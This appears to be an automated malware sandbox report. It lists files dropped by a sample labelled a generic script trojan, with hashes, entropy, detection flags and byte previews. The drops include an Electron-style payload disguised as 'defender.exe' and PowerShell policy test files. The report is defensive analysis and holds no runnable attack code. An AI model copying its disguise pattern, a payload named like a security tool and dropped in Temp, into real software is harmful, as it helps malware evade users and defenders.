                                                                    SHA-512:40D3358B35EB0445127C70DEB0CB87EC1313ECA285307CDA168605A4FD3D558B4BE9EB24A59568ECA9EE1F761E578C39B2DEF63AD48E40D31958DB82F128E0EC
                                                                    Malicious:false
                                                                    Preview: Generated by licenses.py; do not edit. --><!doctype html>.<html>.<head>.<meta charset="utf-8">.<meta name="viewport" content="width=device-width">.<meta name="color-scheme" content="light dark">.<title>Credits</title>.<link rel="stylesheet" href="chrome://resources/css/text_defaults.css">.<link rel="stylesheet" href="chrome://credits/credits.css">.</head>.<body>.<span class="page-title" style="float:left;">Credits</span>.<a id="print-link" href="#" style="float:right;" hidden>Print</a>.<div style="clear:both; overflow:auto;"> Chromium <3s the following projects -->.<div class="product">.<span class="title">2-dim General Purpose FFT (Fast Fourier/Cosine/Sine Transform) Package</span>.<span class="homepage"><a href="http://www.kurims.kyoto-u.ac.jp/~ooura/fft.html">homepage</a></span>.<input type="checkbox" hidden id="0">.<label class="show" for="0" tabindex="0"></label>.<div class="licence">.<pre>Copyright(C) 1997,2001 Takuya OOURA (email: ooura@kurims.kyoto-u.ac.jp)..You may us

                                                                    C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\chrome_100_percent.pak

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):129690
                                                                    Entropy (8bit):7.91868310789661
                                                                    Encrypted:false
                                                                    SSDEEP:3072:AEKzwqCT4weSxQCS/qGTL2o418Gb0+VRLf0ld0GY3cQ39Vm2I:AEKzwt4hC4/rK18Gb0OV8ld0GecQ3f2
                                                                    MD5:8626E1D68E87F86C5B4DABDF66591913
                                                                    SHA1:4CD7B0AC0D3F72587708064A7B0A3BECA3F7B81C
                                                                    SHA-256:2CAA1DA9B6A6E87BDB673977FEE5DD771591A1B6ED5D3C5F14B024130A5D1A59
                                                                    SHA-512:03BCD8562482009060F249D6A0DD7382FC94D669A2094DEC08E8D119BE51BEF2C3B7B484BB5B7F805AE98E372DAB9383A2C11A63AB0F5644146556B1BB9A4C99
                                                                    Malicious:false
                                                                    Preview:..............t...#.....:.I....yp....y6....y.....y#....y.....y`....ym....y.....y.....yI....y.....y'"...y.,...y.7...y;9...yv:...y(<...y.<...y.B...yfH...y.J...y.K...y.L.....M...N...aP...IS...BV...uY...]...Pa....d..&..h..'..i..(.hk..)..l..*..m..+.An..0..n..1.....2.....>.....?.....@.....A.....B.P...C.}...D.....F.9...H.r...I.I...J.....K.....L.....M.....N.6...O.....Q..%..R..(..T..1..U..4..W..>..X..H..^..M.._..N..`.mW..a.._..b..`..c.Cb..d.$d..e.Jg..g..g..i..k..j.*m..k..n..l..p..m..s..n..s..o..u..p..v..r..y..s.|{..u..~..v.<...x.....y.....~.......r..................................8................l.....;..... ......................p.....2..... .....8.....>.......................M.......................^.......................x...r.R...s.....t.....u.K...v.....w.....x.....y.+...z.~...{.....|.....}.a...~.u....._..........._...........l...................................Y.......................;.................R.................w...........6.................].................z.......

                                                                    C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\chrome_200_percent.pak

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):179971
                                                                    Entropy (8bit):7.941375268079628
                                                                    Encrypted:false
                                                                    SSDEEP:3072:rDQYaEQN6AJPrSxQCS/qGTafR54x5GMR+F44ffbdZnYw9p4AbIVGYoDd+HxNK/r4:rDQYaNN68rC4/Ygx5GMRejnbdZnVE6YR
                                                                    MD5:48515D600258D60019C6B9C6421F79F6
                                                                    SHA1:0EF0B44641D38327A360AA6954B3B6E5AAB2AF16
                                                                    SHA-256:07BEE34E189FE9A8789AED78EA59AD41414B6E611E7D74DA62F8E6CA36AF01CE
                                                                    SHA-512:B7266BC8ABC55BD389F594DAC0C0641ECF07703F35D769B87E731B5FDF4353316D44F3782A4329B3F0E260DEAD6B114426DDB1B0FB8CD4A51E0B90635F1191D9
                                                                    Malicious:false
                                                                    Preview:..............t...#.....:.t....y.....y.....y.....y.....y.....y.....y.%...y.*...y.-...yc5...y.9...y.A...y.V...yCk...y.m...y)o...yyr...y#s...y.}...y.....y....y....y................................K....!.......&.....'....(.Q...).....*.....+.*...0....1.....2.....>.....?.f...@..$..A..&..B..)..C.1/..D.M:..F..<..H.JD..I.-K..J..P..K..V..L..\..M..^..N.Vc..O.?g..Q..p..R..t..T.g|..U.X...W.....X.H...^....._.....`.....a.....b.b...c.....d.....e.....g.....i.....j.....k.....l.....m.....n.....o.....p.....r.....s.....u.....v.....x.....y.....~........*.....+...../.....4.....6.....8....T9.....9....~;.....=....q>.....@.....A....FD.....I.....M.....U.....].....c.....i.....o....Tu.....v.....w.....x.....y.....{.....|.....}..........?.........r.....s.U...t.....u.....v....w.....x....y.*...z.....{....|.<...}.....~.............1...........L..........z.................G...........X...........f.....*..........@.....................q...........Y..........W...........;........................

                                                                    C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\d3dcompiler_47.dll

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):4891080
                                                                    Entropy (8bit):6.392150637672776
                                                                    Encrypted:false
                                                                    SSDEEP:49152:IuhjwXkKcimPVqB4faGCMhGNYYpQVTxx6k/ftO4w6FXKpOD21pLeXvZCoFwI8ccA:oy904wYbZCoOI85oyI
                                                                    MD5:CB9807F6CF55AD799E920B7E0F97DF99
                                                                    SHA1:BB76012DED5ACD103ADAD49436612D073D159B29
                                                                    SHA-256:5653BC7B0E2701561464EF36602FF6171C96BFFE96E4C3597359CD7ADDCBA88A
                                                                    SHA-512:F7C65BAE4EDE13616330AE46A197EBAD106920DCE6A31FD5A658DA29ED1473234CA9E2B39CC9833FF903FB6B52FF19E39E6397FAC02F005823ED366CA7A34F62
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Joe Sandbox View:
                                                                    • Filename: SecuriteInfo.com.Win64.Malware-gen.19582.16146.exe, Detection: malicious, Browse
                                                                    • Filename: SecuriteInfo.com.Win64.Malware-gen.19582.16146.exe, Detection: malicious, Browse
                                                                    • Filename: Installer Setup 9.7.0.exe, Detection: malicious, Browse
                                                                    • Filename: Roblox Account Manager.exe, Detection: malicious, Browse
                                                                    • Filename: lookworldafs1244.msi, Detection: malicious, Browse
                                                                    • Filename: node.js.exe, Detection: malicious, Browse
                                                                    • Filename: node.js.exe, Detection: malicious, Browse
                                                                    • Filename: LeqO0KJkDX.exe, Detection: malicious, Browse
                                                                    • Filename: LeqO0KJkDX.exe, Detection: malicious, Browse
                                                                    • Filename: etnY4xJd3y.exe, Detection: malicious, Browse
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........c...c...c..Z....c...c../c....7..c.......c.......c..Z....c..Z...bc..Z....c..Z....c..Z...6c..Z.[..c..Z....c..Rich.c..................PE..d...-L............" ......8.........`.(...................................... K.....2.J...`A..........................................F.x.....F.P.....J.@.....H.......J..!....J......vD.p.....................<.(...P.<.8.............<.(............................text.....8.......8................. ..`.rdata...=....8..@....8.............@..@.data...@.....F.......F.............@....pdata........H.......G.............@..@.rsrc...@.....J.......I.............@..@.reloc........J.......I.............@..B........................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):162041856
                                                                    Entropy (8bit):6.7336610434383255
                                                                    Encrypted:false
                                                                    SSDEEP:1572864:QCquurbtqKajQe7vqrTU4PrCsdCXrBngPE1cG7VOWe2IkBmUgq3Fd6iU3x6VCdbm:qDAgZi
                                                                    MD5:050F6E0968C055E912AB6CA8DC12A881
                                                                    SHA1:0E1A13AD2DE9C529C001DE16D9402B302F258E4C
                                                                    SHA-256:5B287055469879FCCCA0CC432C3C975BC810D91F882C5CCED68626FEDFC30D14
                                                                    SHA-512:9BDF8E242CC60B583FB751C093612F06DBB001A5DE9DAD369078B6CA0EAED6D51109926D758B46058EBF617A8AFF761C0AF3FDBF1DF4B73264319FDB309A13FA
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...>..d.........."......v.....................@..........................................`...........................................D.od..e.H.T............p..,.@.............`.....:.......................:.(...`...8...........P,H......iD......................text....u.......v.................. ..`.rdata...`k......bk..|..............@..@.data....bE...L.......K.............@....pdata..,.@..p....@...V.............@..@.00cfg..(............J..............@..@.gxfg....B.......B...L..............@..@.retplne.....`...........................rodata......p...................... ..`.tls................................@....voltbl.R...............................CPADinfo8...........................@...LZMADEC............................. ..`_RDATA..............................@..@malloc_h............................ ..`.rsrc...............................@..@.reloc..`.......

                                                                    C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\ffmpeg.dll

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):2862080
                                                                    Entropy (8bit):6.7042588011125215
                                                                    Encrypted:false
                                                                    SSDEEP:49152:XMoI7Qj3trgDtcfkW76fSL5Yqq6uthy4Y6NO8PyJegPTagrcjdiCOi2iNN3lzl3U:H3Kk76fUq/4TagreBOirnW
                                                                    MD5:D49E7A8F096AD4722BD0F6963E0EFC08
                                                                    SHA1:6835F12391023C0C7E3C8CC37B0496E3A93A5985
                                                                    SHA-256:F11576BF7FFBC3669D1A5364378F35A1ED0811B7831528B6C4C55B0CDC7DC014
                                                                    SHA-512:CA50C28D6AAC75F749ED62EEC8ACBB53317F6BDCEF8794759AF3FAD861446DE5B7FA31622CE67A347949ABB1098ECCB32689B4F1C54458A125BC46574AD51575
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...>..d.........." ......".........`.........................................B...........`A..........................................).......).(.............@.x.............A..2..D.).....................(.).(...."#.8.............).P............................text....."......."................. ..`.rdata...t....#..v....".............@..@.data...X.....*.."...n*.............@....pdata..x.....@.......*.............@..@.00cfg..(....@A......B+.............@..@.gxfg....+...PA..,...D+.............@..@.retplne\.....A......p+..................tls..........A......r+.............@....voltbl.8.....A......t+................._RDATA........A......v+.............@..@.reloc...2....A..4...x+.............@..B................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\icudtl.dat

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):10541296
                                                                    Entropy (8bit):6.277012685259397
                                                                    Encrypted:false
                                                                    SSDEEP:98304:ffPBQYOo+ddlymff2LfPQCvliXUxiG9Ha93Whla6ZENSs285:ffPBhORjfAHliXUxiG9Ha93Whla6ZEV7
                                                                    MD5:ADFD2A259608207F256AEADB48635645
                                                                    SHA1:300BB0AE3D6B6514FB144788643D260B602AC6A4
                                                                    SHA-256:7C8C7B05D70145120B45CCB64BF75BEE3C63FF213E3E64D092D500A96AFB8050
                                                                    SHA-512:8397E74C7A85B0A2987CAE9F2C66CE446923AA4140686D91A1E92B701E16B73A6CE459540E718858607ECB12659BEDAC0AA95C2713C811A2BC2D402691FF29DC
                                                                    Malicious:false
                                                                    Preview:...'........CmnD........ Copyright (C) 2016 and later: Unicode, Inc. and others. License & terms of use: http://www.unicode.org/copyright.html .Q....B.......B...#...B.. $...B..p$...B...$...B...%...B..`P...C...P...C...Q..(C......<C.....OC......bC..@...uC.......C..P....C.......C.......C..p....C.. ....C.......C.......D..p... D.....3D..0...FD.....YD.....lD.......D......D..0....D.......D..p....D......D..@....D.......E......E..@...*E.....=E..P...NE......bE.....rE..@....E.......E.......E..P....E.......E......E..@....F.......F.....'F..0...7F..P...JF......aF......qF...G...F.. H...F..`K...F...K...F...L...F...-...F...c...G....'.'G....'.>G..@.'.UG..0.'.oG....'..G...!'..G...!'..G..P&'..G...)'..G..@*'..H..`.(..H...e).7H..0.).VH...)*.xH....*..H....*..H...P+..H...Y+..H...Z+..I...]+. I..`^+.9I.. .+.UI....+.lI....+..I..P.-..I...=...I.......I.......I.. ....J..p....J......-J..p...EJ......ZJ......rJ..`....J..@....J.......J.......J..0....J.......J.......J..0....K..@....K..../.2K...,/.GK..../.\K..

                                                                    C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\libEGL.dll

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):479232
                                                                    Entropy (8bit):6.320849747462847
                                                                    Encrypted:false
                                                                    SSDEEP:12288:su0LAjbIkyVVR8O9v/6TiT5eU3axzvYwo:sub49/6TiQzvYX
                                                                    MD5:09134E6B407083BAAEDF9A8C0BCE68F2
                                                                    SHA1:8847344CCEEAB35C1CDF8637AF9BD59671B4E97D
                                                                    SHA-256:D2107BA0F4E28E35B22837C3982E53784D15348795B399AD6292D0F727986577
                                                                    SHA-512:6FF3ADCB8BE48D0B505A3C44E6550D30A8FEAF4AA108982A7992ED1820C06F49E0AD48D9BD92685FB82783DFD643629BD1FE4073300B61346B63320CBDB051BA
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...>..d.........." ................p.....................................................`A........................................x.......e-..(.......x........B..............$...4...........................(...@1..8............0...............................text...E........................... ..`.rdata..,....0......................@..@.data....K....... ..................@....pdata...B.......D..................@..@.00cfg..(....`......................@..@.gxfg...0$...p...&..................@..@.retplne\............4...................tls....!............6..............@....voltbl.8............8.................._RDATA...............:..............@..@.rsrc...x............<..............@..@.reloc..$............B..............@..B........................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\libGLESv2.dll

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):7514112
                                                                    Entropy (8bit):6.462467169487978
                                                                    Encrypted:false
                                                                    SSDEEP:98304:BuT3g23jeZ/02YPuLaw5RoD1rfEQ3CPdOEabcgsOMdi:BuDPTwLap14QzEijsvi
                                                                    MD5:A5F1921E6DCDE9EAF42E2CCC82B3D353
                                                                    SHA1:1F6F4DF99AE475ACEC4A7D3910BADB26C15919D1
                                                                    SHA-256:50C4DC73D69B6C0189EAB56D27470EE15F99BBBC12BFD87EBE9963A7F9BA404E
                                                                    SHA-512:0C24AE7D75404ADF8682868D0EBF05F02BBF603F7DDD177CF2AF5726802D0A5AFCF539DC5D68E10DAB3FCFBA58903871C9C81054560CF08799AF1CC88F33C702
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...>..d.........." ......X..........L.......................................s...........`A..........................................j.....N.j.d.....r.......o.PJ............r.....$.i.......................i.(.....X.8...........P.k.......j.@....................text.....X.......X................. ..`.rdata........X.......X.............@..@.data.........k..|....k.............@....pdata..PJ....o..L...No.............@..@.00cfg..(....0r.......q.............@..@.gxfg...p*...@r..,....q.............@..@.retplne\....pr.......q..................tls....:.....r.......q.............@....voltbl.D.....r.......q................._RDATA........r.......q.............@..@.rsrc.........r.......q.............@..@.reloc........r.......q.............@..B........................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\resources.pak

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):5430320
                                                                    Entropy (8bit):7.995406820581218
                                                                    Encrypted:true
                                                                    SSDEEP:98304:/Zgm9tHEEIcjWbEvKfwa2sEJFz993CNh1QeHQF5qrwrw5z0uxRRrY2kuDYj9ds:RgAtkEx4EKfatyNhHwFkkrw5IcRRtkFs
                                                                    MD5:7971A016AED2FB453C87EB1B8E3F5EB2
                                                                    SHA1:92B91E352BE8209FADCF081134334DEA147E23B8
                                                                    SHA-256:9CFD5D29CDE3DE2F042E5E1DA629743A7C95C1211E1B0B001E4EEBC0F0741E06
                                                                    SHA-512:42082AC0C033655F2EDAE876425A320D96CDAEE6423B85449032C63FC0F7D30914AA3531E65428451C07912265B85F5FEE2ED0BBDB362994D3A1FA7B14186013
                                                                    Malicious:false
                                                                    Preview:............f.R......&....h).....,...4_?...4.G...4.J...4.\...4.e...4.l...4Ho...4.u...4.w...4.y...4.}...4....4&....4H....4.....4....4.....4F....4.....4.....4[....4d....4e....4.....4.....4.....4l....4.....4.....4.....4.....4g....4.....5.....5?....5.....5.....5H....5.:...5.=..~5]D...5oE...5;F...57H...5.H...5mI...5}M...56O...5.T...5{y...5c....5.....5.....5.....5.....5.....5G....5W....<.....<Y(...<.*...<j,...<N-...<.1..,<.2..-</=...<.H../<.T..0<._...@.p...@.x...@g|...@}}...@.~...@.i...Agv...A]x...A.....A.....A'....A....A.....A.....AT....Al....A.....A.....Ao....A$....A.....A2....A=....Ae....A.....A.....AS!...A.%...AH,...Am:...AM<...A:>...A.@...AuB...A.C.. AZF...N....N.....N.....Nc....NL....N....NM....N.....O.....O}....O.....O.....O#....O.....O}....O.....Od....O4....O.....O.0...O.7...Og>...O.A..$O.W..%O.Y..&O]c..'O.d..(O.i..)O.k..*Opm..+O.x..,O(|..-Oq....O..../O....0O....1O...2Og...3O....4O....5Ot...6O....7O....8OV...9OB...:O....;Om...<O....=O....>O....?Om...@OI...AO....BO....CO....DO..

                                                                    C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\snapshot_blob.bin

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):162352
                                                                    Entropy (8bit):4.860588090157433
                                                                    Encrypted:false
                                                                    SSDEEP:1536:uebVb91USSzM+uCPNgswpzHD41OzB965pUB8/DR9BgyLMRPoq/rX4JHj/kMKE0YC:uTgsED41OV965LXMj4zF2Xl9B
                                                                    MD5:8FEF5A96DBCC46887C3FF392CBDB1B48
                                                                    SHA1:ED592D75222B7828B7B7AAB97B83516F60772351
                                                                    SHA-256:4DE0F720C416776423ADD7ADA621DA95D0D188D574F08E36E822AD10D85C3ECE
                                                                    SHA-512:E52C7820C69863ECC1E3B552B7F20DA2AD5492B52CAC97502152EBFF45E7A45B00E6925679FD7477CDC79C68B081D6572EEED7AED773416D42C9200ACCC7230E
                                                                    Malicious:false
                                                                    Preview:.........4D11.0.226.20-electron.0...........................................6.. ...`.......06..a........a........a........ar.......a........a..............a.D.q..........`$.........D.u..........`$.......D.y..........`$.......u.D.}..........`$.........D............`D.........D............`$.......=.D............`$.......D............`$.......D............`$.........D............`$.......D............`$......ID............`$.......D............`$.......D............`$....(Jb....D.....@..F^.!..%.`.....(Jb....H.....@..F^..`.....H...IDa........D`....D`....D`.......`.....D]...D....D`......VIa...........VIa...........VIa...........VIa...........VIa...........VIa...........VIa...........VIa...........VIa...........VIa...........VIa...........VIa...........VIa...........VIa...........VIa...........VIa...........VIa............L.........................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\v8_context_snapshot.bin

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):476792
                                                                    Entropy (8bit):5.595608653079527
                                                                    Encrypted:false
                                                                    SSDEEP:3072:qqgtKzy7vqUSMd+5ZTR4ymbsLIniZiYIU+gTh3WOdvmttow2LyZDvooPmdZwmNgi:lgEzy2NTROsLftIU+gTQ4E2ro+dOmp
                                                                    MD5:A373D83D4C43BA957693AD57172A251B
                                                                    SHA1:8E0FDB714DF2F4CB058BEB46C06AA78F77E5FF86
                                                                    SHA-256:43B58CA4057CF75063D3B4A8E67AA9780D9A81D3A21F13C64B498BE8B3BA6E0C
                                                                    SHA-512:07FBD84DC3E0EC1536CCB54D5799D5ED61B962251ECE0D48E18B20B0FC9DD92DE06E93957F3EFC7D9BED88DB7794FE4F2BEC1E9B081825E41C6AC3B4F41EAB18
                                                                    Malicious:false
                                                                    Preview:.........K..11.0.226.20-electron.0..............................................`....f..8...........h...a........a........aT.......ar.......a........a..............a.D.q..........`$.........D.u..........`$.......D.y..........`$.......u.D.}..........`$.........D............`D.........D............`$.......=.D............`$.......D............`$.......D............`$.........D............`$.......D............`$......ID............`$.......D............`$.......D............`$....(Jb....D.....@..F^.!..%.`.....(Jb....H.....@..F^..`.....H...IDa........D`....D`....D`.......`.....D]...D....D`......VIa...........VIa...........VIa...........VIa...........VIa...........VIa...........VIa...........VIa...........VIa...........VIa...........VIa...........VIa...........VIa...........VIa...........VIa...........VIa...........VIa............L.................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\31dd1108-f1cf-4a57-b5c5-108839a99b19.tmp.node

                                                                    Download File
                                                                    Process:C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe
                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):1851904
                                                                    Entropy (8bit):6.5568028509093335
                                                                    Encrypted:false
                                                                    SSDEEP:49152:B+m+ocH2xfpTOi8stmFlZwwpx8AzdWgl+06OHULH5dsGfl:ihCTOi8sQrZwwpxTbG9
                                                                    MD5:3072B68E3C226AFF39E6782D025F25A8
                                                                    SHA1:CF559196D74FA490AC8CE192DB222C9F5C5A006A
                                                                    SHA-256:7FB52B781709B065C240B6B81394BE6E72E53FE11D7C8E0F7B49DD417EB78A01
                                                                    SHA-512:61EBC72C20195E99244D95AF1AB44FA06201A1AEE2B5DA04490FDC4312E8324A40B0E15A7B42FAB5179753D767C1D08AE1A7A56AC71A6E100E63F83DB849EE61
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........bN... ... ... .Bs#... .Bs%.5. .Bs$... ...$... ...#... ...%... .Bs!... ...!.p. .`.)... .`.... .`."... .Rich.. .........................PE..d...tn.d.........." ...".@...........}....................................................`.................................................P...(............p..|....................~..p............................$..@............P..........@....................text...@>.......@.................. ..`.rdata......P.......D..............@..@.data....c.......N..................@....pdata..|....p.......4..............@..@_RDATA..\....p.......(..............@..@.rsrc................*..............@..@.reloc...............,..............@..B................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\8e248dae-355d-4e79-baba-750b539ead28.tmp.ico

                                                                    Download File
                                                                    Process:C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe
                                                                    File Type:MS Windows icon resource - 1 icon, 256x256 with PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced, 32 bits/pixel
                                                                    Category:dropped
                                                                    Size (bytes):15239
                                                                    Entropy (8bit):7.953514640622158
                                                                    Encrypted:false
                                                                    SSDEEP:384:8rr5xQqKE5p0zBXh1fO4AGp78jMzmY1PgSZgnf:AxQq/T0VXhK88jMCu4SZkf
                                                                    MD5:3604B70768EBA4A49CADD4729A261E79
                                                                    SHA1:82E16BC5353B6418C5FB0177CD69B9377FE72404
                                                                    SHA-256:07B29BE85FFEAB47B6D0E467D084A45AEEDC8B3CE3B6EF2E2C004CA3167184D2
                                                                    SHA-512:65B4C733B376A7883319B5E64DB23196CD89ECF3FBC0100F4E346F66890D672B0CA023893838CBAB7255CF1F5A4B2B358EA0C01694A906A86ADCE11407550BF3
                                                                    Malicious:false
                                                                    Preview:............ .q;.......PNG........IHDR.............\r.f..;8IDATx..it\....x/....$V........l..,K...K..vu..o3.O.gN...3s....e.."....(."%..Hq....@.+.d...".Cd.$....;.6.d.|...G..w...]^...s..`.0.X.,...b ...)...X..b......:........'..@=p....j...2..kB.....a~...s.<.......}.....7vk..B.| .t.W0bp.........L~ O5..k=..~...QW....=?.1...v`%PH..[,S..N..8......av..PO..g.n`X..z...d.K.....@.H.X....].^._1.P..B Hl.f...i......C.....,...1.9..Y,...4.../.oc\.5.g.....a|}......V.....,.;....w......=p&....0...+...<...[,3..p....g.)B|7.H..rk.hU.^`*.'.....o(....G`...s.n...;.....t......g.....&Z.b\^}.....W.B.I...[..K.R..ttV6de.32 5..6lh.54...nD..:;......F!....J{.'.O...s.4...V]l.&...S.........._.........F.W...A-Z.*...BtF:.S.q.v.`...V....A4..h...T.<{.y.$.B....<.Vv...C.K.Y......6......... ..d..#...1]1%.5...~.....K.y.....i...B)..".... .....#......^M.M..1..!.q...B......8$...ga.........!.@.U......t.<tZ...-......t.......A.=....^).......0.~...j..M......3!`.....`4..Y....?.U... ...o

                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3jim333p.nbl.ps1

                                                                    Download File
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mp2k452f.wre.ps1

                                                                    Download File
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q5muckuc.dkq.psm1

                                                                    Download File
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zh204pp4.14q.psm1

                                                                    Download File
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
